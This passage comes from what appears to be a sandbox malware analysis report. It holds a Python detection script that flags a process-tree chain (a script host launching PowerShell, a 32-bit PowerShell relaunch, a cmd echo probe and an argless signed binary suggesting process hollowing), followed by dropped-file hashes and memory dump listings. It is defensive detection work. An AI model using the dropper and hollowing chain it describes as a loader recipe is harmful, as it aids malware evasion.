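    return bare not in (image.lower(), '"%s"' % image.lower())


def evaluate(events):
    """Return (rule, pid) pairs for every child process that matches a rule."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue
        child, par = image_name(e.image), image_name(parent.image)
        # Script host launching PowerShell: the VBS dropper stage.
        if par in SCRIPT_HOSTS and child == "powershell.exe":
            findings.append(("script_host_spawns_powershell", e.pid))
        # 64-bit PowerShell re-launching itself from SysWOW64: a bitness downgrade that lets the
        # second stage work on a 32-bit target (wab.exe lives under Program Files (x86)).
        if par == child == "powershell.exe" and is_wow64(e.image) and not is_wow64(parent.image):
            findings.append(("powershell_wow64_downgrade", e.pid))
        # cmd.exe started only to expand an environment variable with echo; here it resolves the
        # drop path %appdata%\refulge.Bod that later appears under Downloads.
        if par == "powershell.exe" and child == "cmd.exe" and ECHO_ENV_PROBE.search(e.cmdline):
            findings.append(("cmd_echo_env_probe", e.pid))
        # PowerShell starting a watch-listed signed binary with an empty argument list. Together
        # with the SetThreadContext/WriteProcessMemory signatures on the parent this has the shape
        # of process hollowing, although the tree alone does not prove it.
        if (par == "powershell.exe" and child in ARGLESS_HOST_WATCHLIST
                and not has_arguments(e.image, e.cmdline)):
            findings.append(("powershell_spawns_argless_host", e.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in evaluate(EVENTS):
        print(f"{rule}: PID {pid}")
```

Each rule fires on its own, so a single cmd.exe echo would only be a weak signal; the value is that all four fire along one parent chain within seconds, which is what a correlation rule on the process tree should key on.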

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
        Filesize

        68KB

        MD5

        29f65ba8e88c063813cc50a4ea544e93

        SHA1

        05a7040d5c127e68c25d81cc51271ffb8bef3568

        SHA256

        1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

        SHA512

        e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        2de9088cf1a95a0aaa8fe21df2156c5c

        SHA1

        24da9fc01cdffbda6865f590b54fc54e8efec2e8

        SHA256

        ee8e1f98f264004c1ba99f4283694865c9de8e00fd23aa4d36f20a8f17b94a8d

        SHA512

        a03c271f6635deb53917186b00cfa8884d43910019e1ec656f0bfe2b98946715e05915da9a79871de9285e3ef10b0860cada77c042893bfa81f1dfa5402f1578

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E8M8QAECJ2NSW5VQYCC9.temp
        Filesize

        7KB

        MD5

        9cd37f3364f055b69b524ce8c8ad8142

        SHA1

        f7b0463d216384f2d1c39f6ca71aa8b09851b596

        SHA256

        7ea3b94c59b2e349c82ab7cd562d4127d74ac80c04b3d4dbc6da701e3a3ee1ac

        SHA512

        5add01628b887c6c92c26eefcbf52ca311324a18231f32f6908c757c22b9a41c7abdc05245cbe2e933df5e161776de40441ebf4f69ab395ab0c0433f38a2df0e

      • C:\Users\Admin\AppData\Roaming\refulge.Bod
        Filesize

        442KB

        MD5

        d46f9ca4ea9e4dd43d582b9f2e38199e

        SHA1

        09f5c2a00e0f709038145b03889e3ab6263824ed

        SHA256

        94dc661c05f18accf414194688b8950a9e0180df256227f30acf4c606a923d6e

        SHA512

        7cd257aa22802931aa5b9c6adee5a6430fb587da25da24e2756b0aa50af9b47f478e19705b117dc2d6032c410565a027c4545b12aedb403e3ff389567087681b

      • memory/2612-25-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp
        Filesize

        9.6MB

      • memory/2612-35-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp
        Filesize

        9.6MB

      • memory/2612-28-0x0000000002E40000-0x0000000002EC0000-memory.dmp
        Filesize

        512KB

      • memory/2612-27-0x0000000002E40000-0x0000000002EC0000-memory.dmp
        Filesize

        512KB

      • memory/2612-26-0x0000000002E40000-0x0000000002EC0000-memory.dmp
        Filesize

        512KB

      • memory/2612-23-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp
        Filesize

        9.6MB

      • memory/2612-64-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp
        Filesize

        9.6MB

      • memory/2612-21-0x000000001B750000-0x000000001BA32000-memory.dmp
        Filesize

        2.9MB

      • memory/2612-37-0x0000000002E40000-0x0000000002EC0000-memory.dmp
        Filesize

        512KB

      • memory/2612-36-0x0000000002E40000-0x0000000002EC0000-memory.dmp
        Filesize

        512KB

      • memory/2612-38-0x0000000002E40000-0x0000000002EC0000-memory.dmp
        Filesize

        512KB

      • memory/2612-24-0x0000000002E40000-0x0000000002EC0000-memory.dmp
        Filesize

        512KB

      • memory/2612-22-0x0000000001D80000-0x0000000001D88000-memory.dmp
        Filesize

        32KB

      • memory/2760-63-0x0000000000540000-0x00000000015A2000-memory.dmp
        Filesize

        16.4MB

      • memory/2760-65-0x0000000000540000-0x0000000000582000-memory.dmp
        Filesize

        264KB

      • memory/2884-34-0x0000000006730000-0x0000000007768000-memory.dmp
        Filesize

        16.2MB